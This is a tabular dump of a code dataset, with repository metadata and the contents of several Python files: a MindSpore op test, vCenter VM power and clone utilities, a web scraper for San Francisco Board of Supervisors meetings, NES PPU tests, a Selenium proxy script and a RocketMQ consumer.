hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b9dae700c2d4cf24d05cfadeff4203e1c2368b8f | 1,753 | py | Python | tests/st/ops/ascend/test_tbe_ops/test_greater.py | unseenme/mindspore | 4ba052f0cd9146ac0ccc4880a778706f1b2d0af8 | [
"Apache-2.0"
] | 2 | 2020-04-28T03:49:10.000Z | 2020-04-28T03:49:13.000Z | tests/st/ops/ascend/test_tbe_ops/test_greater.py | unseenme/mindspore | 4ba052f0cd9146ac0ccc4880a778706f1b2d0af8 | [
"Apache-2.0"
] | null | null | null | tests/st/ops/ascend/test_tbe_ops/test_greater.py | unseenme/mindspore | 4ba052f0cd9146ac0ccc4880a778706f1b2d0af8 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
from mindspore.ops import operations as P
from mindspore.nn import Cell
from mindspore.common.tensor import Tensor
from mindspore.train.model import Model
from mindspore import log as logger
from mindspore import context
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
@pytest.mark.ssd_tbe | 34.372549 | 78 | 0.691386 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
from mindspore.ops import operations as P
from mindspore.nn import Cell
from mindspore.common.tensor import Tensor
from mindspore.train.model import Model
from mindspore import log as logger
from mindspore import context
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
class Greater(Cell):
def __init__(self):
super(Greater, self).__init__()
self.greater = P.Greater()
def construct(self, inputa, inputb):
return self.greater(inputa, inputb)
def me_greater(inputa, inputb):
net = Greater()
net.set_train()
model = Model(net)
out = model.predict(inputa, inputb)
logger.info("Check input a: ")
logger.info(inputa)
logger.info("Check input b: ")
logger.info(inputb)
return out.asnumpy()
@pytest.mark.ssd_tbe
def test_greater_2d_scalar0():
a = np.random.randint(-5, 5, [8, 32]).astype(np.int32)
b = np.random.randint(-5, 5, [8, 32]).astype(np.int32)
out_me = me_greater(Tensor(a), Tensor(b))
logger.info("Check me result:")
logger.info(out_me) | 622 | -1 | 121 |
08172a7fdd318c375c9231880e991298a8fdd444 | 10,614 | py | Python | web2py/applications/rip/modules/VmOperations.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | 1 | 2019-10-02T13:25:03.000Z | 2019-10-02T13:25:03.000Z | web2py/applications/rip/modules/VmOperations.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | null | null | null | web2py/applications/rip/modules/VmOperations.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | 1 | 2021-11-05T09:51:02.000Z | 2021-11-05T09:51:02.000Z | import pyVmomi
from pyVmomi import vim, vmodl
from DatacenterPrac import Login,GetCluster,GetDatacenter,get_obj,GetClusters
from clusterPrac import GetHostsInClusters
import status
from VMPrac import find_obj,get_container_view,collect_properties
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import time
def vm_ops_handler_wrapper(args):
"""
Wrapping arround vm_ops_handler
"""
return vm_ops_handler(*args)
############################### Cloning Operation #####################
synchObj=multiprocessing.Manager()
vm_result_list=synchObj.list()
def collect_vm_properties(service_instance, view_ref, obj_type, path_set=None,
include_mors=False,desired_vm=None):
"""
Collect properties for managed objects from a view ref
Returns:
A list of properties for the managed objects
"""
collector = service_instance.content.propertyCollector
# Create object specification to define the starting point of
# inventory navigation
obj_spec = pyVmomi.vmodl.query.PropertyCollector.ObjectSpec()
obj_spec.obj = view_ref
obj_spec.skip = True
# Create a traversal specification to identify the path for collection
traversal_spec = pyVmomi.vmodl.query.PropertyCollector.TraversalSpec()
traversal_spec.name = 'traverseEntities'
traversal_spec.path = 'view'
traversal_spec.skip = False
traversal_spec.type = view_ref.__class__
obj_spec.selectSet = [traversal_spec]
# Identify the properties to the retrieved
property_spec = pyVmomi.vmodl.query.PropertyCollector.PropertySpec()
property_spec.type = obj_type
if not path_set:
property_spec.all = True
property_spec.pathSet = path_set
# Add the object and property specification to the
# property filter specification
filter_spec = pyVmomi.vmodl.query.PropertyCollector.FilterSpec()
filter_spec.objectSet = [obj_spec]
filter_spec.propSet = [property_spec]
# Retrieve properties
props = collector.RetrieveContents([filter_spec])
properties = {}
try:
for obj in props:
for prop in obj.propSet:
if prop.val == desired_vm:
properties['name'] = prop.val
properties['obj'] = obj.obj
return properties
else:
pass
except Exception, e:
print "The exception inside collector_properties " + str(e)
return properties
| 30.412607 | 163 | 0.592896 | import pyVmomi
from pyVmomi import vim, vmodl
from DatacenterPrac import Login,GetCluster,GetDatacenter,get_obj,GetClusters
from clusterPrac import GetHostsInClusters
import status
from VMPrac import find_obj,get_container_view,collect_properties
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import time
def vm_ops_handler(vm_name, vm_object, operation,final_result_dict,maxwait = 5):
vm = vm_object
if vm and operation.lower() == "off":
power_off_task = vm.PowerOff()
run_loop = True
while run_loop:
info = power_off_task.info
if info.state == vim.TaskInfo.State.success:
run_loop = False
final_result_dict[vm_name] = "Power off success."
break
elif info.state == vim.TaskInfo.State.error:
if info.error:
final_result_dict[vm_name] = "Power off has quit with error: %s"%info.error
else:
final_result_dict[vm_name] = "Power off has quit with cancelation"
run_loop = False
break
time.sleep(maxwait)
elif vm and operation.lower() == "on":
power_off_task = vm.PowerOn()
run_loop = True
while run_loop:
info = power_off_task.info
if info.state == vim.TaskInfo.State.success:
run_loop = False
final_result_dict[vm_name] = "Power on success."
time.sleep(maxwait)
break
elif info.state == vim.TaskInfo.State.error:
if info.error:
final_result_dict[vm_name] = "Power on has quit with error: %s" % (info.error)
else:
final_result_dict[vm_name] = "Power on has quit with cancelation"
run_loop = False
break
time.sleep(maxwait)
elif operation != "on" or operation != "off":
final_result_dict[vm_name] = "Operation %s not implemented."%operation
def vm_ops_handler_wrapper(args):
"""
Wrapping arround vm_ops_handler
"""
return vm_ops_handler(*args)
def executePowerOps(vcIp, vcUser, vcPassword,dcName,clusterName,operation,pattern_array,vm_array,maxwait):
# Synchronized Object to Hold Results
final_result_dict = {}
try:
si = Login(vcIp, vcUser, vcPassword)
except Exception, e:
resp = str(e)
return dict(stat=resp, status=status.HTTP_403_FORBIDDEN)
try:
dcMor = find_obj(si, dcName, [vim.Datacenter], False)
clusterMor = GetCluster(dcMor, clusterName, si)
for pattern in pattern_array:
vm_properties = ["name"]
view = get_container_view(si, obj_type=[vim.VirtualMachine], container=clusterMor)
vm_data = collect_properties(si, view_ref=view, obj_type=vim.VirtualMachine, path_set=vm_properties,include_mors=True, desired_vm=pattern)
if any(vm_data):
pass
else:
resp = 'Finding VM matching pattern %s failed .' % pattern
return dict(stat=resp,status = status.HTTP_412_PRECONDITION_FAILED)
vm_specs = []
pool = ThreadPool(10)
for vm_name, vm_object in vm_data.iteritems():
vm_specs.append((vm_name, vm_object, operation, final_result_dict, maxwait))
pool.map(vm_ops_handler_wrapper, vm_specs)
pool.close()
pool.join()
except Exception,e:
return "Power operation failed due to %s."%(e)
return dict(final_result_dict)
############################### Cloning Operation #####################
synchObj=multiprocessing.Manager()
vm_result_list=synchObj.list()
def vm_clone_operation(si,template_vm,datacenter,clones,specdict):
global vm_result_list
cls = specdict["cluster"]
content = si.RetrieveContent()
cluster = get_obj(content, [vim.ClusterComputeResource], cls)
resource_pool = cluster.resourcePool
folder = datacenter.vmFolder
datastoresMors = datacenter.datastore
dsname = specdict["datastore"]
dsmor = None
for datastore in datastoresMors:
if datastore.info.name == dsname:
dsmor = datastore
break
hostMors = GetHostsInClusters(datacenter, [cls], 'connected')
hostname = specdict.get("host", None)
hostmor = None
if hostname:
for hostitem in hostMors:
if hostitem.name == hostname:
hostmor = hostitem
break
relocate_spec = vim.vm.RelocateSpec()
relocate_spec.pool = resource_pool
relocate_spec.datastore = dsmor
if hostmor:
relocate_spec.host = hostmor
power = False
if specdict["power"] == "on":
power = True
vmresult = {}
basename = specdict["basename"]
for i in range(clones):
vm_name = basename + "-" + str(i)
try:
clone_spec = vim.vm.CloneSpec(powerOn=power, template=False, location=relocate_spec)
task = template_vm.Clone(name=vm_name, folder=folder, spec=clone_spec)
run_loop = True
while run_loop:
info = task.info
if info.state == vim.TaskInfo.State.success:
vm = info.result
run_loop = False
vmresult[vm_name] = "Created"
elif info.state == vim.TaskInfo.State.running:
pass
elif info.state == vim.TaskInfo.State.queued:
pass
elif info.state == vim.TaskInfo.State.error:
errormsg=None
try:
errormsg = info.error
except Exception, e:
vmresult[vm_name] = str(e)
if errormsg:
vmresult[vm_name] = errormsg
else:
vmresult[vm_name] = "Cancelled"
run_loop = False
break
time.sleep(10)
except Exception, e:
vmresult = ["Failure while initiating cloning %s"%str(e)]
vm_result_list.append(vmresult)
def collect_vm_properties(service_instance, view_ref, obj_type, path_set=None,
include_mors=False,desired_vm=None):
"""
Collect properties for managed objects from a view ref
Returns:
A list of properties for the managed objects
"""
collector = service_instance.content.propertyCollector
# Create object specification to define the starting point of
# inventory navigation
obj_spec = pyVmomi.vmodl.query.PropertyCollector.ObjectSpec()
obj_spec.obj = view_ref
obj_spec.skip = True
# Create a traversal specification to identify the path for collection
traversal_spec = pyVmomi.vmodl.query.PropertyCollector.TraversalSpec()
traversal_spec.name = 'traverseEntities'
traversal_spec.path = 'view'
traversal_spec.skip = False
traversal_spec.type = view_ref.__class__
obj_spec.selectSet = [traversal_spec]
# Identify the properties to the retrieved
property_spec = pyVmomi.vmodl.query.PropertyCollector.PropertySpec()
property_spec.type = obj_type
if not path_set:
property_spec.all = True
property_spec.pathSet = path_set
# Add the object and property specification to the
# property filter specification
filter_spec = pyVmomi.vmodl.query.PropertyCollector.FilterSpec()
filter_spec.objectSet = [obj_spec]
filter_spec.propSet = [property_spec]
# Retrieve properties
props = collector.RetrieveContents([filter_spec])
properties = {}
try:
for obj in props:
for prop in obj.propSet:
if prop.val == desired_vm:
properties['name'] = prop.val
properties['obj'] = obj.obj
return properties
else:
pass
except Exception, e:
print "The exception inside collector_properties " + str(e)
return properties
def vm_clone_handler_wrapper(args):
return vm_clone_operation(*args)
def VMFullClones(vcitem):
cloneresult = {}
vcname = vcitem["vcname"]
user = vcitem["username"]
passw = vcitem["password"]
dcarray = vcitem["dc"]
for dcitem in dcarray:
dcname = dcitem["dcname"]
templatearray = dcitem["templates"]
pool = ThreadPool(4)
vm_specs = []
for templateitem in templatearray:
templatename = templateitem["template"]
container = templateitem["container"]
clones = templateitem["clones"]
specdict = templateitem["clonespecs"]
#print templatename + " will be cloned to " + str(clones) + " with Base name " + basename+ "-" + " with specs " + "VC " + vcname + " " + str(specdict)
si = Login(vcname,user, passw)
content = si.RetrieveContent()
dcMor = GetDatacenter(name=dcname, si=si)
clusterMorList = GetClusters(dcMor, [container])
desiredClusterMor = None
for item in clusterMorList:
desiredClusterMor = item
template_vm = None
if templatename and desiredClusterMor:
vm_properties = ["name"]
view = get_container_view(si, obj_type=[vim.VirtualMachine], container=desiredClusterMor)
try:
vm_data = collect_vm_properties(si, view_ref=view,
obj_type=vim.VirtualMachine,
path_set=vm_properties,
include_mors=True, desired_vm=templatename)
if vm_data['name'] == templatename:
template_vm = vm_data['obj']
except Exception,e:
cloneresult[templatename] = "Template Not Found due to error %s"%str(e)
if template_vm is None:
template_vm = get_obj(content, [vim.VirtualMachine], templatename)
if template_vm is None:
cloneresult[templatename] = "Template Not Found"
continue
vm_specs.append([si,template_vm,dcMor,clones,specdict])
pool.map(vm_clone_handler_wrapper, vm_specs)
pool.close()
pool.join()
cloneresult["result"] = list(vm_result_list)
return cloneresult
| 7,966 | 0 | 115 |
711e7df3699b858ec5ecc93f2a9be8160a8cd912 | 759 | py | Python | __init__.py | Kurokitu/maimaiDX | 7c800ad220b300b6a71c36734a3a3f5c42dea796 | [
"MIT"
] | 31 | 2021-08-12T08:39:31.000Z | 2022-03-31T03:57:53.000Z | __init__.py | Kurokitu/maimaiDX | 7c800ad220b300b6a71c36734a3a3f5c42dea796 | [
"MIT"
] | 7 | 2021-09-12T17:47:36.000Z | 2022-03-10T00:50:49.000Z | __init__.py | Kurokitu/maimaiDX | 7c800ad220b300b6a71c36734a3a3f5c42dea796 | [
"MIT"
] | 14 | 2021-09-14T08:24:29.000Z | 2022-03-04T18:45:02.000Z | import os, json
from typing import List, Dict
from hoshino.log import new_logger
log = new_logger('maimaiDX')
static = os.path.join(os.path.dirname(__file__), 'static')
arcades_json = os.path.join(os.path.dirname(__file__), 'arcades.json')
if not os.path.exists(arcades_json):
raise '请安装arcades.json文件'
arcades: List[Dict] = json.load(open(arcades_json, 'r', encoding='utf-8'))
config_json = os.path.join(os.path.dirname(__file__), 'config.json')
if not os.path.exists('config.json'):
with open('config.json', 'w', encoding='utf-8') as f:
json.dump({'enable': [], 'disable': []}, f)
config: Dict[str, List[int]] = json.load(open(config_json, 'r', encoding='utf-8'))
aliases_csv = os.path.join(static, 'aliases.csv')
| 34.5 | 83 | 0.677207 | import os, json
from typing import List, Dict
from hoshino.log import new_logger
log = new_logger('maimaiDX')
static = os.path.join(os.path.dirname(__file__), 'static')
arcades_json = os.path.join(os.path.dirname(__file__), 'arcades.json')
if not os.path.exists(arcades_json):
raise '请安装arcades.json文件'
arcades: List[Dict] = json.load(open(arcades_json, 'r', encoding='utf-8'))
config_json = os.path.join(os.path.dirname(__file__), 'config.json')
if not os.path.exists('config.json'):
with open('config.json', 'w', encoding='utf-8') as f:
json.dump({'enable': [], 'disable': []}, f)
config: Dict[str, List[int]] = json.load(open(config_json, 'r', encoding='utf-8'))
aliases_csv = os.path.join(static, 'aliases.csv')
| 0 | 0 | 0 |
e302e4ab91ddf5d09900ee41e53487821c29002d | 848 | py | Python | functional test automation/webdriver/chromedriver with browsermob proxy on python/script.py | 4qu3l3c4r4/Automation-Test-Knowledge-Base | 7f6f1ba374d9277647bde6a7feaa6a6e8b53ae8f | [
"MIT"
] | 191 | 2015-01-11T10:47:03.000Z | 2022-03-14T09:14:50.000Z | functional test automation/webdriver/chromedriver with browsermob proxy on python/script.py | TATJAVAPavelKlindziuk/at.info-knowledge-base | 7f6f1ba374d9277647bde6a7feaa6a6e8b53ae8f | [
"MIT"
] | 2 | 2021-06-04T02:10:01.000Z | 2022-03-31T20:21:06.000Z | functional test automation/webdriver/chromedriver with browsermob proxy on python/script.py | TATJAVAPavelKlindziuk/at.info-knowledge-base | 7f6f1ba374d9277647bde6a7feaa6a6e8b53ae8f | [
"MIT"
] | 175 | 2015-01-09T16:45:09.000Z | 2022-02-12T23:54:23.000Z | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import NoSuchElementException,
ElementNotVisibleException
from browsermobproxy import Server
import urlparse
server = Server(r"c:\browsermob\bin\browsermob-proxy.bat")
server.start()
proxy = server.create_proxy()
proxy.new_har()
chrome_options = webdriver.ChromeOptions()
proxy = urlparse.urlparse(proxy.proxy).netloc
chrome_options.add_argument('--proxy-server=%s' % proxy)
driver = webdriver.Chrome(
executable_path=r"c:\chromedriver.exe",
chrome_options=chrome_options)
driver.get("http://google.com.ua/")
driver.find_element_by_id("gbqfsb").click()
print proxy.har
driver.quit()
server.stop()
| 30.285714 | 63 | 0.78066 | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import NoSuchElementException,
ElementNotVisibleException
from browsermobproxy import Server
import urlparse
server = Server(r"c:\browsermob\bin\browsermob-proxy.bat")
server.start()
proxy = server.create_proxy()
proxy.new_har()
chrome_options = webdriver.ChromeOptions()
proxy = urlparse.urlparse(proxy.proxy).netloc
chrome_options.add_argument('--proxy-server=%s' % proxy)
driver = webdriver.Chrome(
executable_path=r"c:\chromedriver.exe",
chrome_options=chrome_options)
driver.get("http://google.com.ua/")
driver.find_element_by_id("gbqfsb").click()
print proxy.har
driver.quit()
server.stop()
| 0 | 0 | 0 |
05c659702239746f12fc1478586571165ea4b702 | 5,498 | py | Python | city_scrapers/spiders/sf_bos.py | washabstract/city-scrapers-la | 574060aa25f81ceaf340fd0428c9cb97f5a70ed6 | [
"MIT"
] | null | null | null | city_scrapers/spiders/sf_bos.py | washabstract/city-scrapers-la | 574060aa25f81ceaf340fd0428c9cb97f5a70ed6 | [
"MIT"
] | 6 | 2021-03-15T04:47:44.000Z | 2022-03-07T21:16:20.000Z | city_scrapers/spiders/sf_bos.py | washabstract/city-scrapers-la | 574060aa25f81ceaf340fd0428c9cb97f5a70ed6 | [
"MIT"
] | 2 | 2022-01-12T21:45:44.000Z | 2022-01-20T02:36:46.000Z | from datetime import datetime
from urllib.parse import urljoin
from city_scrapers_core.constants import CLASSIFICATIONS, NOT_CLASSIFIED
from city_scrapers_core.spiders import CityScrapersSpider
from dateutil.parser import parse as datetime_parse
from city_scrapers.items import Meeting
| 36.899329 | 88 | 0.548017 | from datetime import datetime
from urllib.parse import urljoin
from city_scrapers_core.constants import CLASSIFICATIONS, NOT_CLASSIFIED
from city_scrapers_core.spiders import CityScrapersSpider
from dateutil.parser import parse as datetime_parse
from city_scrapers.items import Meeting
class SfBosSpider(CityScrapersSpider):
name = "sf_bos"
agency = "San Francisco Board of Supervisors"
timezone = "America/Los_Angeles"
start_urls = ["https://sfbos.org/events/calendar"]
def parse(self, response):
"""
`parse` should always `yield` Meeting items.
Change the `_parse_title`, `_parse_start`, etc methods to fit your scraping
needs.
"""
meeting_table = response.css(".views-table tbody")
default_address = response.css("footer div.sf311::text").get().strip()
for item in meeting_table.css("tr"):
meeting = Meeting(
title=self._parse_title(item),
classification=self._parse_classification(item),
start=self._parse_start(item),
end=self._parse_end(item),
all_day=self._parse_all_day(item),
time_notes=self._parse_time_notes(item),
location=self._parse_location(item, default_address),
source=self._parse_source(response),
created=datetime.now(),
updated=datetime.now(),
)
meeting["status"] = self._get_status(meeting)
meeting["id"] = self._get_id(meeting)
yield response.follow(
item.css('td.views-field-title a::attr("href")').get(),
callback=self._parse_event,
cb_kwargs={"meeting": meeting, "item": item},
dont_filter=True,
)
def _parse_event(self, response, meeting, item):
"""Parse or generate event contents from event yield."""
event_contents = None
if "files" in response.url:
event_contents = response.url
meeting["description"] = "More information: " + event_contents
else:
event_contents = response.css("article.node-event .content")
meeting["description"] = event_contents.get()
links = []
if type(event_contents) is str:
links.append(
{"href": event_contents, "title": "Meeting/Agenda Information"}
)
else:
for link in event_contents.css(".field-type-link-field"):
new_link = {
"href": link.css('a::attr("href")').get(),
"title": link.css("div.field-label::text").get(),
}
if "additional information link" in new_link["title"].lower():
new_link["title"] = "Meeting/Agenda Information"
for link in event_contents.css("div.calendar-links a"):
links.append(
{
"href": urljoin(response.url, link.css('::attr("href")').get()),
"title": link.css("::text").get(),
}
)
links.append(
{
"href": urljoin(
response.url,
item.css('td.views-field-title a::attr("href")').get(),
),
"title": meeting["title"],
}
)
meeting["links"] = links
return meeting
def _parse_title(self, item):
"""Parse or generate meeting title."""
return item.css("td.views-field-title a::text").get()
def _parse_classification(self, item):
"""Parse or generate classification from allowed options."""
for classification in CLASSIFICATIONS:
if classification in item.css("td.views-field-title a::text").get():
return classification
return NOT_CLASSIFIED
def _parse_start(self, item):
"""Parse start datetime as a naive datetime object."""
return datetime_parse(item.css("span.date-display-single::text").get())
def _parse_end(self, item):
"""Parse end datetime as a naive datetime object. Added by pipeline if None"""
return None
def _parse_time_notes(self, item):
"""Parse any additional notes on the timing of the meeting"""
return ""
def _parse_all_day(self, item):
"""Parse or generate all-day status. Defaults to False."""
return False
def _parse_location(self, item, default_address):
"""Parse or generate location."""
loc_str = item.css("td.views-field-field-event-location-premise").get().strip()
if "cancel" in loc_str.lower():
return {
"address": "",
"name": "",
}
if "remote" in loc_str.lower():
return {
"address": "",
"name": loc_str,
}
try:
int(loc_str)
except ValueError:
return {
"address": default_address.replace("Room 244", loc_str),
"name": "SF BOS " + loc_str,
}
else:
return {
"address": default_address.replace("244", loc_str),
"name": "SF City Hall Room " + loc_str,
}
def _parse_source(self, response):
"""Parse or generate source."""
return response.url
| 0 | 5,186 | 23 |
2d46e2b1310c147d85ecf41a0b56fa86f3a1ad4b | 2,371 | py | Python | pynes/tests/ppu_test.py | timgates42/pyNES | e385c7189eca44b9a9e0e781b28c8562e0647b0b | [
"BSD-3-Clause"
] | 1,046 | 2015-02-10T02:23:58.000Z | 2022-03-16T02:42:02.000Z | pynes/tests/ppu_test.py | mcanthony/pyNES | 5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b | [
"BSD-3-Clause"
] | 30 | 2015-02-11T15:21:10.000Z | 2022-03-11T23:12:26.000Z | pynes/tests/ppu_test.py | mcanthony/pyNES | 5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b | [
"BSD-3-Clause"
] | 132 | 2015-05-28T14:55:04.000Z | 2021-12-09T18:58:45.000Z | import unittest
from pynes.game import PPU
| 37.046875 | 60 | 0.694644 | import unittest
from pynes.game import PPU
class PPUTest(unittest.TestCase):
def setUp(self):
self.ppu = PPU()
def tearDown(self):
self.ppu = None
def test_ppu_toogle_nmi(self):
self.assertEquals(0b00000000, self.ppu.ctrl)
self.ppu.nmi_enable = True
self.assertEquals(0b10000000, self.ppu.ctrl)
self.assertEquals(True, self.ppu.nmi_enable)
self.ppu.nmi_enable = False
self.assertEquals(0b00000000, self.ppu.ctrl)
self.assertEquals(False, self.ppu.nmi_enable)
def test_ppu_toogle_sprite_table(self):
self.assertEquals(0b00000000, self.ppu.ctrl)
self.ppu.sprite_pattern_table = 1
self.assertEquals(0b00001000, self.ppu.ctrl)
self.ppu.sprite_pattern_table = 0
self.assertEquals(0b00000000, self.ppu.ctrl)
def test_ppu_toogle_background_table(self):
self.assertEquals(0b00000000, self.ppu.ctrl)
self.ppu.background_pattern_table = 1
self.assertEquals(0b00010000, self.ppu.ctrl)
self.ppu.background_pattern_table = 0
self.assertEquals(0b00000000, self.ppu.ctrl)
def test_ppu_toogle_sprite(self):
self.assertEquals(0b00000000, self.ppu.mask)
self.ppu.sprite_enable = True
self.assertEquals(0b00010000, self.ppu.mask)
self.assertEquals(True, self.ppu.sprite_enable)
self.ppu.sprite_enable = False
self.assertEquals(0b00000000, self.ppu.mask)
self.assertEquals(False, self.ppu.sprite_enable)
def test_ppu_toogle_background(self):
self.assertEquals(0b00000000, self.ppu.mask)
self.ppu.background_enable = True
self.assertEquals(0b00001000, self.ppu.mask)
self.assertEquals(True, self.ppu.background_enable)
self.ppu.background_enable = False
self.assertEquals(0b00000000, self.ppu.mask)
self.assertEquals(False, self.ppu.background_enable)
def test_ppu_toogle_background2(self):
self.assertEquals(0b00000000, self.ppu.ctrl)
self.assertEquals(0b00000000, self.ppu.mask)
self.ppu.nmi_enable = True
self.ppu.sprite_enable = True
self.assertEquals(0b10000000, self.ppu.ctrl)
self.assertEquals(True, self.ppu.nmi_enable)
self.assertEquals(0b00010000, self.ppu.mask)
self.assertEquals(True, self.ppu.sprite_enable)
| 2,075 | 12 | 239 |
9c32b01abcbb815a323cd7c3687055b5fdcd01bf | 1,667 | py | Python | test/PushConsumer.py | GangLuICT/RMQ-Client4Python | 5a7cfe2efc1e6c009090b891d0a4fb0dc03ce3e4 | [
"MIT"
] | 32 | 2016-08-26T02:35:42.000Z | 2021-12-03T02:31:45.000Z | test/PushConsumer.py | GangLuICT/RMQ-Client4Python | 5a7cfe2efc1e6c009090b891d0a4fb0dc03ce3e4 | [
"MIT"
] | null | null | null | test/PushConsumer.py | GangLuICT/RMQ-Client4Python | 5a7cfe2efc1e6c009090b891d0a4fb0dc03ce3e4 | [
"MIT"
] | 11 | 2016-12-14T09:17:33.000Z | 2021-01-08T13:31:07.000Z | #!/usr/bin/python
# -*- coding:utf-8 -*-
import logging
logger = logging.getLogger("PushConsumer")
#导入上级目录模块
import sys
sys.path.append("..")
import settings_MQ as settings
#启动JVM
from jpype import *
jvmPath = getDefaultJVMPath()
startJVM(jvmPath, settings.JVM_OPTIONS, "-Djava.ext.dirs="+settings.JAVA_EXT_DIRS)
#startJVM(jvmPath, "-Djava.class.path=" + settings.RMQClientJAR + ":")
logger.info(java.lang.System.getProperty("java.class.path"))
logger.info(java.lang.System.getProperty("java.ext.dirs"))
#启动JVM之后才能调用JPackage,否则找不到相关的jar包
from MQPushConsumer import MQPushConsumer
from MQMessageListener import msgListenerConcurrentlyProxy, msgListenerOrderlyProxy
from MQMessage import ConsumeFromWhere, MessageModel
# 为了支持文本中文输入,要显式设置编码;该编码不影响Message的Body的编码
import sys
if sys.getdefaultencoding() != 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8');
import time
if __name__ == '__main__':
consumer = MQPushConsumer('MQClient4Python-Consumer', 'jfxr-7:9876;jfxr-6:9876')
consumer.init()
consumer.setMessageModel(MessageModel['CLUSTERING']) # 默认是CLUSTERING
#consumer.setMessageModel(MessageModel.CLUSTERING) # 默认是CLUSTERING
consumer.subscribe("RMQTopicTest", "TagB")
consumer.setConsumeFromWhere(ConsumeFromWhere['CONSUME_FROM_LAST_OFFSET'])
#consumer.setConsumeFromWhere(ConsumeFromWhere.CONSUME_FROM_LAST_OFFSET)
#consumer.registerMessageListener(msgListenerConcurrentlyProxy)
consumer.registerMessageListener(msgListenerOrderlyProxy)
consumer.start()
while True:
time.sleep(1)
#监听状态时不需要shutdown,除非真实想退出!
#consumer.shutdown()
#监听状态时JVM也不能退出,除非真实想退出!
#shutdownJVM()
| 29.245614 | 84 | 0.769646 | #!/usr/bin/python
# -*- coding:utf-8 -*-
import logging
logger = logging.getLogger("PushConsumer")
#导入上级目录模块
import sys
sys.path.append("..")
import settings_MQ as settings
#启动JVM
from jpype import *
jvmPath = getDefaultJVMPath()
startJVM(jvmPath, settings.JVM_OPTIONS, "-Djava.ext.dirs="+settings.JAVA_EXT_DIRS)
#startJVM(jvmPath, "-Djava.class.path=" + settings.RMQClientJAR + ":")
logger.info(java.lang.System.getProperty("java.class.path"))
logger.info(java.lang.System.getProperty("java.ext.dirs"))
#启动JVM之后才能调用JPackage,否则找不到相关的jar包
from MQPushConsumer import MQPushConsumer
from MQMessageListener import msgListenerConcurrentlyProxy, msgListenerOrderlyProxy
from MQMessage import ConsumeFromWhere, MessageModel
# 为了支持文本中文输入,要显式设置编码;该编码不影响Message的Body的编码
import sys
if sys.getdefaultencoding() != 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8');
import time
if __name__ == '__main__':
consumer = MQPushConsumer('MQClient4Python-Consumer', 'jfxr-7:9876;jfxr-6:9876')
consumer.init()
consumer.setMessageModel(MessageModel['CLUSTERING']) # 默认是CLUSTERING
#consumer.setMessageModel(MessageModel.CLUSTERING) # 默认是CLUSTERING
consumer.subscribe("RMQTopicTest", "TagB")
consumer.setConsumeFromWhere(ConsumeFromWhere['CONSUME_FROM_LAST_OFFSET'])
#consumer.setConsumeFromWhere(ConsumeFromWhere.CONSUME_FROM_LAST_OFFSET)
#consumer.registerMessageListener(msgListenerConcurrentlyProxy)
consumer.registerMessageListener(msgListenerOrderlyProxy)
consumer.start()
while True:
time.sleep(1)
#监听状态时不需要shutdown,除非真实想退出!
#consumer.shutdown()
#监听状态时JVM也不能退出,除非真实想退出!
#shutdownJVM()
| 0 | 0 | 0 |
